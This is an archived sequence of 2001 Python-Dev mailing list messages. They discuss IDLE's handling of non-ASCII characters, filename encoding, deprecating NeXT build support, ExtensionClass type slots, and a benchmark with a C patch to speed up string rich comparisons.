The question is how IDLE should deal with it. Regards, Martin From loewis at informatik.hu-berlin.de Mon May 14 13:41:26 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:41:26 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com> Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> > Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? Perhaps the Tcl version? That sounds like the issue that Marc talked about: Tk behaves differently when text is entered programmatically (and perhaps through cut-n-paste), as compared to text entered through the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on Solaris 8 still gives me the UnicodeError. Regards, Martin From MarkH at ActiveState.com Mon May 14 14:20:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 22:20:43 +1000 Subject: [Python-Dev] Py_FileSystemDefaultEncoding In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl> Message-ID: > I'm not too thrilled with the way the filename encoding stuff was > done, with a My apologies. I did try and publicise the patch as much as possible. A misguided attempt at a low-impact change :( I have checked in the changes you suggest. Mark. From barry at digicool.com Mon May 14 14:54:59 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 08:54:59 -0400 Subject: [Python-Dev] Unicode docs References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15103.54691.560967.853132@anthem.wooz.org> >>>>> "M" == M writes: M> True.
The main source of documentation for Unicode still is the M> proposal itself (Misc/unicode.txt). It needs some reordering M> and a few examples, but does contain all the information needed M> to grasp what the implementation intends and how it works. As a first step, why not PEP-ify that document, much as has been done with the DB-API (version 1 & 2)? It can be an informational PEP. -Barry From esr at thyrsus.com Mon May 14 17:11:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 11:11:57 -0400 Subject: [Python-Dev] State of curses tutorial? In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200 References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff> Message-ID: <20010514111157.C10920@thyrsus.com> Fredrik Lundh : > it's in the py-howto CVS tree: > > http://sourceforge.net/projects/py-howto What module is the Python-HOWTO in? -- Eric S. Raymond "The best we can hope for concerning the people at large is that they be properly armed." -- Alexander Hamilton, The Federalist Papers at 184-188 From skip at pobox.com Mon May 14 17:54:54 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 14 May 2001 10:54:54 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <15103.65486.61021.328424@beluga.mojam.com> Martin> That *should* work, except that it also has its 'methods' field Martin> where tp_traverse would go, and its class_flags field where Martin> tp_clear would go. Okay, so I'm completely confused now.
I extended the definition of ECTypeType to include this after the doc string slot: (traverseproc)0, /* tp_traverse */ (inquiry)0, /* tp_clear */ (richcmpfunc)0, /* rich comparisons */ 0L, /* weak reference enabler */ #ifdef COUNT_ALLOCS /* these must be last */ 0, /* tp_alloc */ 0, /* tp_free */ 0, /* tp_maxalloc */ (struct _typeobject *)0, /* tp_next */ #endif When I looked at the definition of ECType, after the doc string I saw METHOD_CHAIN(ExtensionClass_methods) as Martin indicated. I can't simply insert the same zeroes at the end of the ECType def'n as I did at the end of the ECTypeType definition. Where does this METHOD_CHAIN thing go? I looked at the def'n of struct _typeobject in Include/object.h but didn't see a slot that looked suitable. FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, I get Fatal Python error: UNREF invalid object when I run my failing script. This is with and without making any changes to ECType or ECTypeType. Skip From sdm7g at Virginia.EDU Mon May 14 19:04:56 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Mon, 14 May 2001 13:04:56 -0400 (EDT) Subject: [Python-Dev] deprecated platforms Message-ID: Jack asked me about: https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470 which concerns removing the support for --with-next-framework from the build procedure. I'm all for removing it: it's broken for OSX, if it worked, it doesn't do the whole job ( I think framework support should eventually be added for OSX with a separate post-build script -- a real framework should encapsulate all of the python libs, docs and headers files in one bundle. ) nobody seems to know if it still works on Next or OpenStep. However, I said I thought there ought to be some sort of official procedure for removing platform support. This doesn't seem to be addressed in either PEP 4 (Deprecation of Standard Modules) or PEP 5 (Guidelines for Language Evolution). 
I don't think it needs to be as involved a process as PEP 4 or 5 -- it's a more reversible decision than removing a feature from the language. Although, removing a platform dependent feature -- like in the long discussion about case sensitivity -- may be a bigger deal. But I'm really thinking more about things like the Next case -- where there are build options and #ifdefs that, as far as we know, haven't been tested in several versions. ( Believe it or not, there are still folks hanging dearly onto their black NeXT cubes, and finding them useful -- but I have no idea if any of them are using Python, and there are lots of users out there whom we only hear from when they discover a problem. ) Perhaps there should be some sort of "Last Call for Platform Saviour" : if nobody steps forward who is willing to do test builds on that platform, support may be removed if maintaining it is getting in the way. Any thoughts or opinions on this? Are there any other platforms where this might become an issue ? If this looks like it's unlikely to crop up again, then maybe we don't need to bother with a 'policy'. What about support for particular compilers and build environments: (Borland C on Windows and MPW on Mac are two examples of "minority" compilers.) BTW: As I've thought more about this particular issue (--with-next-framework) I don't think it's as big an issue -- removing that switch isn't going to break the build entirely (I think!). Pulling out all of the #ifdefs for Next would be a larger issue, but that hasn't been proposed (yet). If the consensus is that this isn't a big enough issue, in general, to need an official policy, then I vote to pull it out and see if anyone screams. -- Steve Majewski From guido at digicool.com Mon May 14 22:53:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 15:53:26 -0500 Subject: [Python-Dev] deprecated platforms In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
References: Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com> I can't really add much to this discussion, since I have *absolutely* *no* *idea* what kind of framework we're talking about here... I agree with Steve that we shouldn't be too scared of removing support for obsolete platforms. People hanging on to obsolete platforms may as well hang on to obsolete Python versions... --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Mon May 14 21:40:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 21:40:21 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> > Okay, so I'm completed confused now. I extended the definition of > ECTypeType to include this after the doc string slot: > > (traverseproc)0, /* tp_traverse */ > (inquiry)0, /* tp_clear */ > (richcmpfunc)0, /* rich comparisons */ > 0L, /* weak reference enabler */ > > #ifdef COUNT_ALLOCS > /* these must be last */ > 0, /* tp_alloc */ > 0, /* tp_free */ > 0, /* tp_maxalloc */ > (struct _typeobject *)0, /* tp_next */ > #endif Why did you do that? ECTypeType has the right data type (PyTypeObject). It is the instances of PyExtensionClass that are troubling > When I looked at the definition of ECType, after the doc string I saw > > METHOD_CHAIN(ExtensionClass_methods) > > as Martin indicated. I can't simply insert the same zeroes at the end of > the ECType def'n as I did at the end of the ECTypeType definition. Of course not. ECType is of type PyExtensionClass, not of type PyTypeObject. Those are similar, but not equal. 
> Where does this METHOD_CHAIN thing go? I looked at the def'n of > struct _typeobject in Include/object.h but didn't see a slot that > looked suitable. Just have a look at ExtensionClass.h instead. > FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, > I get > > Fatal Python error: UNREF invalid object > > when I run my failing script. This is with and without making any changes > to ECType or ECTypeType. BTW, what version of PyGtk did you try to compile? I've tried the 0.7.0-dont-use, and it can run examples/testgtk without major problems (the example did need some updates, since it is apparently outdated). My Gtk version was 1.2, on Linux. In any case, I think you need to analyse this in a debugger. Regards, Martin From tim at digicool.com Mon May 14 22:12:44 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 16:12:44 -0400 Subject: [Python-Dev] Comparison speed Message-ID: Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107 0.106 0.109 0.106 0.106 0.106 0.106 0.106 0.105 0.106
C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118 0.118 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118
C:\Code\python\dist\src\PCbuild>python timech.py
0.119 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%. string_compare hasn't changed, so rich comparisons are a good guess.
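This measurement can still be repeated today, but not with this exact harness. `time.clock` no longer exists in Python 3 (it was removed in 3.8), and the standard `timeit` module now supplies the repetition loop. What follows is a minimal sketch under these assumptions:

- The function name `time_compare` is hypothetical.
- The operands are bound to variables rather than written as literals.
- `timeit` supplies its own for-loop, so this corresponds to the for-loop variant rather than the while-loop above.

Absolute numbers from a modern interpreter are not comparable with the 2001 figures.

```python
import timeit


def time_compare(stmt="a < b", env=None, number=100_000, repeat=10):
    """Return `repeat` timings, in seconds, each for `number` runs of `stmt`.

    timeit wraps `stmt` in its own for-loop, so each figure includes loop
    overhead as well as the comparison itself.
    """
    if env is None:
        env = {"a": "ab", "b": "cd"}  # operands as variables, not literals
    return timeit.repeat(stmt, globals=env, number=number, repeat=repeat)


if __name__ == "__main__":
    for seconds in time_compare():  # str < str
        print("%.3f" % seconds)
    for seconds in time_compare("x < y", {"x": 2, "y": 3}):  # int < int
        print("%.3f" % seconds)
```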
Note that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070 0.069 0.069 0.070 0.069 0.069 0.069 0.070 0.069 0.069
C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076 0.076 0.076 0.076 0.076 0.077 0.076 0.076 0.076 0.076
C:\Code\python\dist\src\PCbuild>python timech.py
0.069 0.070 0.070 0.069 0.069 0.070 0.070 0.069 0.070 0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out the comparison slowdown. If we try it with a type of comparison that avoids the richcmp machinery (int < int is special-cased in ceval), current CVS is actually faster than 2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056 0.056 0.056 0.056 0.055 0.056 0.058 0.058 0.055 0.056
C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059 0.059 0.059 0.060 0.060 0.059 0.059 0.060 0.059 0.059
C:\Code\python\dist\src\PCbuild>python timech.py
0.053 0.052 0.052 0.053 0.053 0.052 0.052 0.054 0.052 0.053
C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason other than richcmps. These were all done on a Win2K box; timings vary too much on a Win9x box to be useful. Anybody care to take a stab at making the new richcmp and/or coerce code ugly again? speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Mon May 14 22:34:35 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 22:34:35 +0200 Subject: [Python-Dev] deprecated platforms Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de> > I'm all for removing it: So am I. There are way too many build options for building Python on the Mac-like systems already (e.g.
after that change, you still have --with-dyld - or rather the option of still building .o extensions). If it is clearly broken (even if only on OSX), it should be removed. Anybody interested in the flag would need to make it work correctly before it can be revived. > However, I said I thought there ought to be some sort of official > procedure for removing platform support. I don't think such a procedure is necessary. It is not that any end user would be concerned; building Python is an activity of system administrators. The other PEPs are there because changing the language or removing modules might break *applications* that used to work after an upgrade of Python. With removed platform support, nothing will break - installations would continue to use the last release that did support that platform. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Tue May 15 00:06:57 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 00:06:57 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? When stepping through the code, I also missed support for the relationship between identity and equality. E.g. in PyObject_RichCompare, I'd expect

    if (v == w) {
        switch (op) {
        case Py_EQ: case Py_LE: case Py_GE:
            Py_INCREF(Py_True);
            return Py_True;
        case Py_NE: case Py_LT: case Py_GT:
            Py_INCREF(Py_False);
            return Py_False;
        }
    }

That would not help in your case, of course. I don't even know how frequent comparing identical objects is in real life - but this is something that PyObject_Compare has that PyObject_RichCompare currently doesn't. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 14 23:55:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Mon, 14 May 2001 23:55:39 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? Hi Tim, With CVS Python, 1000000 iterations, and a for loop, I currently got 0.780 0.770 0.770 0.780 0.770 0.770 0.770 0.780 0.770 0.770 With the patch below, I get 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 0.710 0.710 The idea is to let strings support richcmp; this also allows some optimization for the EQ case. Please let me know what you think. Martin Index: stringobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v retrieving revision 2.115 diff -u -r2.115 stringobject.c --- stringobject.c 2001/05/10 00:32:57 2.115 +++ stringobject.c 2001/05/14 21:36:36 @@ -596,6 +596,51 @@ return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0; } +/* In the signature, only a is guaranteed to be a PyStringObject. + However, as the first thing in the function, we check that b + is of that type also. */ + +static PyObject* +string_richcompare(PyStringObject *a, PyStringObject *b, int op) +{ + int c; + PyObject *result; + if (!PyString_Check(b)) { + result = Py_NotImplemented; + goto out; + } + if (op == Py_EQ) { + if (a->ob_size != b->ob_size) { + result = Py_False; + goto out; + } +#ifdef CACHE_HASH + if (a->ob_shash != b->ob_shash + && a->ob_shash != -1 + && b->ob_shash != -1) { + result = Py_False; + goto out; + } +#endif + } + c = string_compare(a, b); + switch (op) { + case Py_LT: c = c < 0; break; + case Py_LE: c = c <= 0; break; + case Py_EQ: c = c == 0; break; + case Py_NE: c = c != 0; break; + case Py_GT: c = c > 0; break; + case Py_GE: c = c >= 0; break; + default: + result = Py_NotImplemented; + goto out; + } + result = c ? 
Py_True : Py_False; + out: + Py_INCREF(result); + return result; +} + static long string_hash(PyStringObject *a) { @@ -2409,6 +2454,12 @@ &string_as_buffer, /*tp_as_buffer*/ Py_TPFLAGS_DEFAULT, /*tp_flags*/ 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + (richcmpfunc)string_richcompare, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ }; void From gstein at lyra.org Tue May 15 00:17:56 2001 From: gstein at lyra.org (Greg Stein) Date: Mon, 14 May 2001 15:17:56 -0700 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400 References: Message-ID: <20010514151755.P1374@lyra.org> On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote: >... > Anybody care to take a stab at making the new richcmp and/or coerce code > ugly again? > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim Euh... isn't Guido's preference for cleanliness over speed? Cheers, -g -- Greg Stein, http://www.lyra.org/ From tim at digicool.com Tue May 15 00:35:33 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 18:35:33 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010514151755.P1374@lyra.org> Message-ID: [Greg Stein] > Euh... isn't Guido's preference for cleanliness over speed? So do both. From greg at cosc.canterbury.ac.nz Tue May 15 03:42:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 15 May 2001 13:42:49 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" : > I also missed support for the > relationship between identity and equality. That would severely restrict the semantics that could be given to the comparison operators by overloading them. 
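Greg's objection can be made concrete with a present-day Python 3 sketch:

- IEEE-754 NaN already compares unequal to itself.
- A user-defined `__eq__` may do the same. The class `NeverEqual` below is a hypothetical example.
- Current CPython containers take an identity shortcut anyway: membership tests and list comparison check `is` before calling `__eq__`. That is exactly the kind of assumption under debate here.

```python
class NeverEqual:
    """Hypothetical type whose == is False even against itself."""

    def __eq__(self, other):
        return False

    def __ne__(self, other):
        return True

    __hash__ = object.__hash__  # defining __eq__ would otherwise disable hashing


nan = float("nan")
x = NeverEqual()

# Identity does not imply equality once comparisons can be overloaded.
print(nan is nan, nan == nan)   # True False
print(x is x, x == x)           # True False

# Containers nevertheless check identity first, so both are "found".
print(nan in [nan], x in [x])   # True True
print([nan] == [nan])           # True
```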
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Tue May 15 04:40:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 21:40:33 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST." <20010514151755.P1374@lyra.org> References: <20010514151755.P1374@lyra.org> Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com> > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim > > Euh... isn't Guido's preference for cleanliness over speed? Yeah, Tim & I have developed a nice good-cop-bad-cop routine about this. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 15 05:36:42 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:36:42 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > When stepping through the code, I also missed support for the > relationship between identity and equality. E.g. in > PyObject_RichCompare, I'd expect > > if (v == w) { > switch (op) > case Py_EQ:case Py_LE:case Py_GE: > Py_INCREF(Py_True); > return Py_True; > case Py_NE:case Py_LT:case Py_GT: > Py_INCREF(Py_False); > return Py_False; > } > } > > That would not help in your case, of course. I don't even know how > frequent comparing identical objects is in real life - but this is > something that PyObject_Compare has that PyObject_RichCompare > currently doesn't. 
Guido insisted (with cause ) on these four pairs as being equivalent: x < y iff y > x x <= y y >= x x == y y == x x != y y != x but beyond that, in the presence of rich comparisons, agreed not to make any other assumptions about what those pixel-bags "mean". In particular, there's no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies "x != y", etc. Applying that to the above leaves you with nothing but if (v == w && op == Py_EQ) /* then return Py_True */ Which is about all PyObject_Compare's if (v == w) return 0; assumes too. So I don't see much future in that. [later, a patch to fill in the richcmp slot for strings] > +static PyObject* > +string_richcompare(PyStringObject *a, PyStringObject *b, int op) > +{ > + int c; > + PyObject *result; > + if (!PyString_Check(b)) { > + result = Py_NotImplemented; > + goto out; > + } > + if (op == Py_EQ) { > + if (a->ob_size != b->ob_size) { > + result = Py_False; > + goto out; > + } > +#ifdef CACHE_HASH > + if (a->ob_shash != b->ob_shash > + && a->ob_shash != -1 > + && b->ob_shash != -1) { > + result = Py_False; > + goto out; > + } > +#endif > + } > + c = string_compare(a, b); > + switch (op) { > + case Py_LT: c = c < 0; break; > + case Py_LE: c = c <= 0; break; > + case Py_EQ: c = c == 0; break; > + case Py_NE: c = c != 0; break; > + case Py_GT: c = c > 0; break; > + case Py_GE: c = c >= 0; break; > + default: > + result = Py_NotImplemented; > + goto out; > + } > + result = c ? Py_True : Py_False; > + out: > + Py_INCREF(result); > + return result; [and that yields about an 8% speedup in the "<" case] That looks on the right track, but maybe at the wrong level: why is it necessary? That is, the bulk of the "smarts" here in the switch stmt are type-independent: if there's no specific implementation of individual comparisons, but there is a tp_compare, then the switch stmt applies verbatim to *any* such type. Do we have to fill in the richcmp slot for everything to get Python to realize that? 
I mean "just about everything", too: while, e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then, but thru the general comparison routines). The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+ which calls PyObject_RichCompare()
+ which calls do_richcmp()
+ which calls try_rich_compare() (unsuccessfully now, successfully after your patch)
  which fails to find a richcmp slot on either operand (now) so says "not implemented"
+ then calls try_3way_to_rich_compare()
+ which calls try_3way_compare()
+ which finally calls the tp_compare slot
+ then runs exactly the same

      switch (op) {
      case Py_LT: c = c < 0; break;
      case Py_LE: c = c <= 0; break;
      case Py_EQ: c = c == 0; break;
      case Py_NE: c = c != 0; break;
      case Py_GT: c = c > 0; break;
      case Py_GE: c = c >= 0; break;
      }
      result = c ? Py_True : Py_False;

  switch as your patch

and things unwind. So we've got 7 function calls there, not even counting calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine instructions that actually do the compare. You got an 8% speedup for one type by tricking the switch stmt into appearing 3 calls earlier. What if the implementation were smarter, and did it for *all* relevant types even a call or two before that? I don't see any reason "in principle" that compares couldn't be much faster, and via the usual gimmicks: bigger, smarter functions that remember what they've already determined so don't need to figure it out over and over again, and fast paths to favor common cases at the expense of comparisons from Mars.
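The last step of that chain turns a three-way result into the answer for one of the six rich operators, and it is small enough to sketch. This is a Python 3 illustration, not CPython's C code. The names `OUTCOME`, `three_way` and `rich_from_cmp` are hypothetical, and the operators are spelled as strings rather than the C constants `Py_LT` and friends.

```python
# Each rich operator mapped to a test on a three-way result c
# (negative, zero or positive), mirroring the C switch above.
OUTCOME = {
    "<": lambda c: c < 0,
    "<=": lambda c: c <= 0,
    "==": lambda c: c == 0,
    "!=": lambda c: c != 0,
    ">": lambda c: c > 0,
    ">=": lambda c: c >= 0,
}


def three_way(a, b):
    """Old-style cmp(): -1, 0 or 1."""
    return (a > b) - (a < b)


def rich_from_cmp(a, b, op, cmp=three_way):
    """Answer the rich comparison `a op b` using only a three-way compare."""
    test = OUTCOME.get(op)
    if test is None:
        return NotImplemented  # like the default: branch in the string patch
    return test(cmp(a, b))
```

The table does not depend on the operand type. Any type with a working three-way compare gets all six answers from it, which is why it could be applied once for every type instead of being rediscovered deep in the call chain.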
One thing to note here: the workhorse comparisons are "like strings" in having no *logical* need for richcmps at all; and the objects for which richcmps were introduced were numerical arrays, which can much better afford a longer code path to *find* them (one matrix compare will trigger many vanilla element compares anyway, so even for arrays it's much more important that the *latter* be fast). The code now is approximately backwards in that respect (it takes gobs of work before we even *look* for a cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're doing an explicit "cmp" compare, the code now tries to *simulate* cmp first via a long sequence of richcmp calls!). I don't have time to uglify this code, but Python would benefit from it. and-no-matter-what-guido-may-say-ly y'rs - tim From tim.one at home.com Tue May 15 05:50:00 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:50:00 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message-ID: [Guido] > Index: spam.c > ... Congratulations! "My other" ISP (MSN) just started tagging suspected spam with "spam" in the subject line, and my mail reader moves that to a special spam folder upon delivery. So far this is the one and only incoming email it's moved. Many solicitations to help foreign nationals move large sums of money out of their country have gotten through, along with a number of intriguing promises that I can easily increase the size of my penis -- like I have any need for either of those.
Raymond) Date: Mon, 14 May 2001 23:53:38 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: ; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400 References: Message-ID: <20010514235338.C663@thyrsus.com> Tim Peters : > Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through, along with a number of > intriguing promises that I can easily increase the size of my penis -- like I > have any need for either of those . What we should truly fear is the prospect that you might increase the size of your . -- Eric S. Raymond "The state calls its own violence `law', but that of the individual `crime'" -- Max Stirner From uche.ogbuji at fourthought.com Tue May 15 06:26:31 2001 From: uche.ogbuji at fourthought.com (Uche Ogbuji) Date: Mon, 14 May 2001 22:26:31 -0600 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message from "Tim Peters" of "Mon, 14 May 2001 23:50:00 EDT." Message-ID: <200105150426.f4F4QVx01531@localhost.local> > [Guido] > > Index: spam.c > > ... > > Congratulations! "My other" ISP (MSN) just started tagging suspected spam > with "spam" in the subject line, and my mail reader moves that to a special > spam folder upon delivery. So far this is the one and only incoming email > it's moved. Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through [...] I thought I was th only one getting all these silly Nigerian scam spams. I figured maybe they saw my name and decided to test on me (though they might more cleverly have figured that a fellow Nigerian would be wise to the game). However, with the (sloppily) bogus headers I've always found on those things, I'm surprised your ISP couldn't sniff them out. Not that it matters. The Eastern Nigerian proverb gets it right. 
"Once hunters learn to shoot without missing, birds will learn to fly without resting". -- Uche Ogbuji Principal Consultant uche.ogbuji at fourthought.com +1 303 583 9900 x 101 Fourthought, Inc. http://Fourthought.com 4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Tue May 15 08:28:34 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 02:28:34 -0400 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> Message-ID: [Guido] > Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? [Martin] > Perhaps the Tcl version? That sounds like the issue that Marc talked > about: Tk behaves differently when text is entered programmatically > (and perhaps through cut-n-paste), as compared to text entered through > the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on > Solaris 8 still gives me the UnicodeError. I don't know which version of Python Guido used. I tried cut-&-paste of s='??' from his email into the distributed 2.1 IDLE under Win98, and got UnicodeError: ASCII encoding error: ordinal not in range(128) Tk appears to interfere with using the usual Windows ALT+0nnn method of entering funny characters, so unsure what happens then -- but for me it either works fine or does something insane (moves the cursor to the left margin, brings up an IDLE dialog box, etc). If I open the system Character Map utility and copy-&-paste using *that*, I can enter all sorts of stuff without problem: >>> s = "?????????????????????????????????" >>> s '\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef \xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' >>> So not all clipboard entries are created equal. Another clue: if I paste the s='??' 
snippet from Guido's email into a file opened with Notepad, then immediately copy it again from the Notepad doc, then paste that into Idle, again no problem:

>>> s='äö'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODTEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk grabs an unfortunate data format (when present) from the clipboard in preference to a fortunate one. the-clipboard-is-a-complex-beast-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Tue May 15 08:44:23 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 08:44:23 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> > Applying that to the above leaves you with nothing but > > if (v == w && op == Py_EQ) /* then return Py_True */ > > [...] So I don't see much future in that. Is this really exactly what Python would guarantee? I'm surprised that x==x would always be true, but x!=x might be true also. In a type where x!=x holds, wouldn't people also want to say that x==x might fail? IOW, I had expected that you'd reduced it to

    if (v == w && op == Py_EQ) /* then return Py_True */
    if (v == w && op == Py_NE) /* then return Py_False */

